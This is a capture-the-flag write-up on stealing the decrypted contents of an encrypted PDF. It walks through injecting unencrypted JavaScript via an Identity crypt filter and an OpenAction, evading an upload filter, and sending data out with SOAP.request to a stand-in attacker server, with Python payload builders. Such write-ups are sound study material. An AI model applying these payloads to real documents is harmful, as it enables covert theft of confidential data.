# PDF-Xfiltration

> Try to steal data from Dr. Virus to understand what's happening to your brother.

The description also links to a web page with lengthy lore, but TL;DR:
- we are given an encrypted PDF file,
- our task is to read its contents,
- we can upload a PDF file to a provided web app,
- the uploaded PDF will be opened by a bot in PDF-XChange Editor version 7.0.326.1.

First we looked at the PDF-XChange Editor changelog at
https://www.tracker-software.com/product/pdf-xchange-editor/history and found out that the next version fixed the following
vulnerability:

> The Editor, and our other products that work with XMP, are now not affected by the "Billion laughs attack".

The linked support forum thread included a PoC exploiting an XXE vulnerability in XMP metadata. We pursued this
approach for a while, but either it didn't work or the upload page refused to accept our PDF file:

```
Error on upload: XXE attack attempt detected. This is not the right path.
```

We even obfuscated the XMP metadata stream using an `/ASCIIHexDecode` filter, but guess what... **it wasn't the
right path**. It was also quite possible that the password for the provided encrypted PDF wasn't stored on the filesystem
at all, so the XXE approach wouldn't have helped us anyway.
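For reference, the `/ASCIIHexDecode` obfuscation amounts to hex-encoding the stream bytes and terminating them with `>`, the filter's end-of-data marker. Below is a minimal Python sketch, assuming a standalone XMP metadata stream object; `make_hex_stream`, the object number and the placeholder XMP content are hypothetical and not taken from our actual attempt:

```python
import binascii


def ascii_hex_encode(data: bytes) -> bytes:
    """Encode bytes for a stream declared with /Filter /ASCIIHexDecode."""
    # Two hex digits per byte; '>' is the filter's end-of-data marker.
    return binascii.hexlify(data).upper() + b">"


def make_hex_stream(obj_num: int, payload: bytes) -> bytes:
    """Hypothetical helper: wrap an XMP payload in a hex-encoded metadata stream."""
    encoded = ascii_hex_encode(payload)
    header = (
        f"{obj_num} 0 obj\n"
        f"<< /Type /Metadata /Subtype /XML /Filter /ASCIIHexDecode /Length {len(encoded)} >>\n"
        "stream\n"
    ).encode("ascii")
    # /Length counts only the bytes between "stream\n" and the EOL before "endstream".
    return header + encoded + b"\nendstream\nendobj\n"


if __name__ == "__main__":
    xmp = b"<x:xmpmeta xmlns:x='adobe:ns:meta/'/>"  # placeholder metadata
    print(make_hex_stream(11, xmp).decode("ascii"))
```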

Our next idea was to prepare a PDF file with an interactive text input and an attached script that would send us its
contents. If the bot was programmed to type a password into a dialog and press [enter], that might send us the
password. Submitting the form would display a warning asking the user whether to send the form to us, but we
reckoned the bot's [enter] press might accept it automatically. Sadly, it just didn't work.

Back to the drawing board... and a lot of Googling, which fortunately was quite fruitful. We came upon a paper
describing what is basically a solution to our challenge: exfiltrating encrypted content from a maliciously
modified PDF as soon as it is opened.

We recommend reading it in full: https://pdf-insecurity.org/download/paper-pdf_encryption-ccs2019.pdf. That's
some really cool research!

The main issue with PDF encryption is that only parts of the file (strings and streams) are encrypted, and nothing is
authenticated at all. We can modify all the unencrypted parts as we wish and even add our own unencrypted objects. The
idea is to add custom JavaScript code that, once the document is opened and decrypted, sends the decrypted data back to us.

A PDF file basically consists of numbered objects: dictionaries of attributes, plus data in the form of strings
and streams (binary data). Our provided PDF file looks like this (abbreviated; some objects are omitted):

```
1 0 obj
<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog >>
2 0 obj
<< /CreationDate <5052dd9f3a4e02156dad8653cdaebd0ec9924e398fb069b7a68e1ed3cd9f75605d2a95540b770dd7919dd6ed943b1c77> /Producer <1c1a1e2d0766c0ecdfad3c10ce7deb030e3a69c2bcd4267ca67f9e681344e55159a02e86b7ef87678e7b2c12052acfdea82cd1f08237e293cdb84a4310a59a30> >>
3 0 obj
<< /Contents 5 0 R /MediaBox 6 0 R /Parent 4 0 R /Resources 7 0 R /Type /Page >>
...
5 0 obj
<< /Filter /FlateDecode /Length 272 >>
... binary data ...
...
9 0 obj
<< /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV3 /Length 32 >> >> /Filter /Standard /Length 256 /O <c37e813188aee0710d84780cdbd8f5911de08ad42e126bd25c7333caf4540eddf5206f6a77d78ecad15e92cb7d1eefe2> /OE <47892a2defde16d7c57eb11f414f6da78f0464984b0e95cbc8d17a8c720b9fcd> /P -1028 /Perms <0169d0437c42dabefbcd653efced456b> /R 6 /StmF /StdCF /StrF /StdCF /U <3c9aa6a28f972b072f290ae4781ab76ae1335bcfd46dc00f1c4dd24e65ea8986e9179277232bfd7462c44640382f8a9b> /UE <6c3394663ab0ce631d011e61a7891f3da2e9c9bdc22a3dde8d1efd6db0c0ceec> /V 5 >>
0 10
0000000000 65535 f
0000000015 00000 n
0000000087 00000 n
0000000362 00000 n
0000000458 00000 n
0000000517 00000 n
0000000861 00000 n
0000000898 00000 n
0000001004 00000 n
0000001101 00000 n
trailer << /Info 2 0 R /Root 1 0 R /Size 10 /ID [<25577b924d52c40dabeb58264f356ef8><25577b924d52c40dabeb58264f356ef8>] /Encrypt 9 0 R >>
```

So we have 9 objects, and one of them, object 5, is a stream with binary data. The trailer at the end of the file
is the first thing PDF readers process. The most important entry is `/Root 1 0 R`, which tells the reader that
the document root (the catalog) is object 1, and, in our case, `/Encrypt 9 0 R`, which says that the document is
encrypted and that the encryption details are specified in object 9.
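To make the trailer's role concrete, here is a rough Python sketch that pulls the indirect references out of the trailer shown above with a regular expression. It is only an illustration: real readers locate the trailer through `startxref` and parse it properly, and `trailer_refs` is a hypothetical helper.

```python
import re

TRAILER = (
    "trailer << /Info 2 0 R /Root 1 0 R /Size 10 "
    "/ID [<25577b924d52c40dabeb58264f356ef8><25577b924d52c40dabeb58264f356ef8>] "
    "/Encrypt 9 0 R >>"
)


def trailer_refs(trailer: str) -> dict:
    """Map each key holding an indirect reference to (object number, generation)."""
    # Matches "/Key <num> <gen> R"; plain values like "/Size 10" are skipped.
    return {
        key: (int(num), int(gen))
        for key, num, gen in re.findall(r"/(\w+)\s+(\d+)\s+(\d+)\s+R\b", trailer)
    }


refs = trailer_refs(TRAILER)
print(refs["Root"], refs["Encrypt"])  # (1, 0) (9, 0)
```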

```
9 0 obj
<< /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV3 /Length 32 >> >> /Filter /Standard /Length 256 /O <c37e813188aee0710d84780cdbd8f5911de08ad42e126bd25c7333caf4540eddf5206f6a77d78ecad15e92cb7d1eefe2> /OE <47892a2defde16d7c57eb11f414f6da78f0464984b0e95cbc8d17a8c720b9fcd> /P -1028 /Perms <0169d0437c42dabefbcd653efced456b> /R 6 /StmF /StdCF /StrF /StdCF /U <3c9aa6a28f972b072f290ae4781ab76ae1335bcfd46dc00f1c4dd24e65ea8986e9179277232bfd7462c44640382f8a9b> /UE <6c3394663ab0ce631d011e61a7891f3da2e9c9bdc22a3dde8d1efd6db0c0ceec> /V 5 >>
```

These attributes specify when the app should ask for a password (`/AuthEvent /DocOpen`), the encryption algorithm and
its parameters (`/CFM /AESV3`, i.e. AES-256), and whether strings (`/StrF`), streams (`/StmF`) and embedded files should
be considered encrypted. In our case, all of them should be encrypted. That's not helpful, because our JavaScript code has
to be provided as either a string or a stream, and without the password we can't encrypt it with the document key. As it
turns out, both the PDF standard and implementation quirks in various reader apps let us include unencrypted content
anyway. In the case of PDF-XChange Editor, we can add a `/Crypt` filter to a stream specifying the special "Identity"
crypt filter, which means no encryption at all.
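The relevant entries of the encryption dictionary can be read off the same way. The Python sketch below uses hypothetical, regex-based helpers (not a real PDF parser) on an abbreviated copy of object 9 with the hex values dropped. It shows that both strings and streams default to the `StdCF` filter, which uses AES-256 (`AESV3`). A stream that declares `/Filter [/Crypt]` with `/Name /Identity` overrides that default, because `Identity` is the PDF standard's predefined pass-through crypt filter.

```python
import re
from typing import Optional

# Object 9 from the challenge file, with the /O, /OE, /U, /UE and /Perms hex strings dropped.
ENCRYPT = (
    "<< /CF << /StdCF << /AuthEvent /DocOpen /CFM /AESV3 /Length 32 >> >> "
    "/Filter /Standard /Length 256 /P -1028 /R 6 /StmF /StdCF /StrF /StdCF /V 5 >>"
)


def name_value(d: str, key: str) -> Optional[str]:
    """Value of the first `/key /Name` pair in a dictionary string."""
    m = re.search(rf"/{key}\b\s*/(\w+)", d)
    return m.group(1) if m else None


def int_value(d: str, key: str) -> Optional[int]:
    """Value of the first `/key <integer>` pair in a dictionary string."""
    m = re.search(rf"/{key}\b\s+(-?\d+)", d)
    return int(m.group(1)) if m else None


print(
    f"V={int_value(ENCRYPT, 'V')} R={int_value(ENCRYPT, 'R')} "
    f"cipher={name_value(ENCRYPT, 'CFM')} "
    f"strings={name_value(ENCRYPT, 'StrF')} streams={name_value(ENCRYPT, 'StmF')}"
)
```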

So let's add a new unencrypted object to our PDF file:

```
10 0 obj
<< /Filter [/Crypt] /DecodeParms [<< /Name /Identity >>]
/Length 25 >>
... 25 bytes of JavaScript code ...
```
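Generating such an object programmatically mostly comes down to computing `/Length` correctly. A minimal Python sketch; `make_identity_js_stream` and the placeholder payload URL are hypothetical, and the payload is not the 25-byte script from our exploit:

```python
def make_identity_js_stream(obj_num: int, js: str) -> bytes:
    """Build a JavaScript stream object exempt from the document's encryption.

    /Filter [/Crypt] with /Name /Identity selects the pass-through crypt
    filter, so the reader uses the bytes as-is instead of AES-decrypting them.
    """
    body = js.encode("latin-1")
    header = (
        f"{obj_num} 0 obj\n"
        f"<< /Filter [/Crypt] /DecodeParms [<< /Name /Identity >>] /Length {len(body)} >>\n"
        "stream\n"
    ).encode("ascii")
    return header + body + b"\nendstream\nendobj\n"


if __name__ == "__main__":
    # Placeholder payload; the URL is hypothetical.
    obj = make_identity_js_stream(10, "SOAP.request('http://attacker.example/', [])")
    print(obj.decode("latin-1"))
```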

That object by itself isn't going to execute the JavaScript code. We also need to reference it from the catalog object.

So we change object 1 from:

```
<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog >>
```

to:

```
<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog /OpenAction << /JS 10 0 R /S /JavaScript >> >>
```

The added `/OpenAction` entry specifies that the JavaScript code from object 10 should be executed when the document is opened.
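Patching the catalog is plain string surgery. A minimal Python sketch, assuming the catalog dictionary fits on one line, ends in `>>` and has no `/OpenAction` yet (`add_catalog_entry` is a hypothetical helper). Note that changing an object's length shifts the byte offsets of everything after it, and this sketch does not fix up the xref table.

```python
def add_catalog_entry(catalog: str, entry: str) -> str:
    """Insert `entry` just before the closing '>>' of a one-line dictionary."""
    stripped = catalog.rstrip()
    if not stripped.endswith(">>"):
        raise ValueError("expected a dictionary ending with '>>'")
    return stripped[:-2].rstrip() + " " + entry + " >>"


catalog = "<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog >>"
patched = add_catalog_entry(catalog, "/OpenAction << /JS 10 0 R /S /JavaScript >>")
print(patched)
# << /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog /OpenAction << /JS 10 0 R /S /JavaScript >> >>
```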

Now that we can execute our code, we need an exfiltration method. Existing research describes a few of them.
Preferably we'd want a 0-click way to send a network request, and after testing several approaches we found that
`SOAP.request('http://server/', [])` sends an HTTP request without triggering any warnings or dialogs in PDF-XChange Editor.
We submitted the PDF with these changes and, voilà, soon noticed an incoming HTTP request. Great.
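On our side, anything that logs incoming requests will do. Here is a minimal Python listener built on the standard library's `http.server`, as a sketch: the port is arbitrary, and stripping the query string is based on the `?WSDL` suffix that showed up in the requests we received.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

received = []  # decoded request paths, oldest first


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        # Drop the query string (e.g. "?WSDL") and URL-decode the path.
        path = unquote(urlsplit(self.path).path)
        received.append(path)
        print(path, flush=True)
        self.send_response(200)
        self.end_headers()

    def log_message(self, format, *args) -> None:
        pass  # keep stdout limited to the captured paths


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), ExfilHandler).serve_forever()
```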

So how do we exfiltrate data from the now-decrypted stream in object 5? Again, there are several documented approaches.
At first, we used the simplest, pure-JavaScript method based on the `getPageNthWord()` function. We got the
following request:

```
GET /Patient,Details,Name,Alfonso,Manfreso,DOB,03,15,1959,Gender,M,Patient,ID,15646548,Results,to,the,COVID,test,INS,PDF,NCrypt,0n,BYp,ss,Thr0uGh,D,r3ct,3xf1ltRat1oN?WSDL HTTP/1.1
```

We can kind of see the flag there: `INS,PDF,NCrypt,0n,BYp,ss,Thr0uGh,D,r3ct,3xf1ltRat1oN`, but all the special
characters are missing. We tried to guess them, but gave up after a few failed submissions.
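Splitting the logged request line back into words makes it easy to see what got lost. Below is a small Python sketch (the helper name is hypothetical) applied to the request above. Compared with the final flag, every punctuation character acted as a word separator and disappeared. In Adobe's Acrobat JavaScript API reference, `getPageNthWord()` takes an optional third argument, `bStrip`, that removes punctuation and defaults to `true`. This sketch makes no claim about how PDF-XChange Editor treats that argument.

```python
from typing import List
from urllib.parse import unquote, urlsplit

# The request line we received, wrapped for readability.
REQUEST_LINE = (
    "GET /Patient,Details,Name,Alfonso,Manfreso,DOB,03,15,1959,Gender,M,"
    "Patient,ID,15646548,Results,to,the,COVID,test,INS,PDF,NCrypt,0n,BYp,ss,"
    "Thr0uGh,D,r3ct,3xf1ltRat1oN?WSDL HTTP/1.1"
)


def exfiltrated_words(request_line: str) -> List[str]:
    """Recover the comma-joined words from a logged 'METHOD target VERSION' line."""
    _method, target, _version = request_line.split(" ")
    path = unquote(urlsplit(target).path)
    return path.lstrip("/").split(",")


words = exfiltrated_words(REQUEST_LINE)
print(words[words.index("INS"):])
```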

We can't access streams directly from the JavaScript API, but there are two types of objects, annotations and embedded files, that:
- can be accessed from the JavaScript API,
- can have their contents point to another stream.

First we tried annotations, but the upload form blocked every PDF containing the required `/Annots` key.
That left us with embedded files. Once again, we can add their definitions to the catalog.

We change it from the previously modified version:

```
<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog /OpenAction << /JS 10 0 R /S /JavaScript >> >>
```

to:

```
<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog /OpenAction << /JS 10 0 R /S /JavaScript >> /Names << /EmbeddedFiles << /Names [(x) << /EF << /F 5 0 R >> >> ] >> >> >>
```

The added `/Names << /EmbeddedFiles << /Names [(x) << /EF << /F 5 0 R >> >> ] >> >>` entry specifies an embedded file
named "x" whose contents are the stream in object 5.
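The name-tree entry can be generated for any file name and stream number. A Python sketch with hypothetical helpers, again assuming a single-line catalog ending in `>>`; the file specification is the same minimal one used in the writeup, with only `/EF /F` set.

```python
def embedded_files_entry(name: str, stream_obj: int) -> str:
    """Build a /Names entry exposing object `stream_obj` as the embedded file `name`."""
    return (
        f"/Names << /EmbeddedFiles << /Names [({name}) "
        f"<< /EF << /F {stream_obj} 0 R >> >> ] >> >>"
    )


def add_catalog_entry(catalog: str, entry: str) -> str:
    """Insert `entry` just before the closing '>>' of a one-line dictionary."""
    stripped = catalog.rstrip()
    if not stripped.endswith(">>"):
        raise ValueError("expected a dictionary ending with '>>'")
    return stripped[:-2].rstrip() + " " + entry + " >>"


catalog = (
    "<< /PageLayout /OneColumn /Pages 4 0 R /Type /Catalog "
    "/OpenAction << /JS 10 0 R /S /JavaScript >> >>"
)
patched = add_catalog_entry(catalog, embedded_files_entry("x", 5))
print(patched)
```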

The embedded file's contents can then be read in JavaScript with `util.stringFromStream(this.getDataObjectContents("x",true));`.

Once again the upload form tried to annoy us by blacklisting the function name, but this time we had several ways
to obfuscate the code. The simplest, `util.stringFromStream(this["getDat" + "aObje" + "ctContents"]("x",true))`, did the job.
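Building the final script programmatically makes the obfuscation easy to vary. Below is a Python sketch with hypothetical helpers and a placeholder server URL. It splits the blacklisted name into string chunks, reads the embedded file `x` and sends it with `SOAP.request`. Wrapping the data in `encodeURIComponent` is an assumption of this sketch rather than part of the exploit as described: characters such as `#` in the flag would otherwise start a URL fragment and never reach the server.

```python
BLACKLISTED = "getDataObjectContents"  # name rejected by the upload form


def split_identifier(name: str, chunk: int = 5) -> str:
    """Return a JS expression such as "getDa" + "taObj" + ... that rebuilds `name`."""
    parts = [name[i:i + chunk] for i in range(0, len(name), chunk)]
    return " + ".join(f'"{p}"' for p in parts)


def build_exfil_js(server_url: str, file_name: str) -> str:
    """Hypothetical payload: read embedded file `file_name` and send it to `server_url`."""
    getter = split_identifier(BLACKLISTED)
    return (
        f'var data = util.stringFromStream(this[{getter}]("{file_name}", true));\n'
        f"SOAP.request('{server_url}' + encodeURIComponent(data), []);\n"
    )


if __name__ == "__main__":
    print(build_exfil_js("http://attacker.example/", "x"))
```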

We sent the final payload and got the complete flag in the incoming HTTP request: `INS{PDF_#NCrypt!0n_BYp@ss_Thr0uGh_D/r3ct_3xf1ltRat1oN}`

The challenge would have been a lot easier if we had also found the PoCs published alongside the original paper on PDF
exfiltration, but at least it forced us to learn a lot about PDF internals :).

[We also provide the complete Python script that makes the necessary modifications](./kodzik.py), along with the [original](./original.pdf) and [final](./final.pdf) PDF files.

Original writeup (https://github.com/p4-team/ctf/tree/master/2022-01-29-insomnihack/pdf-xfiltration).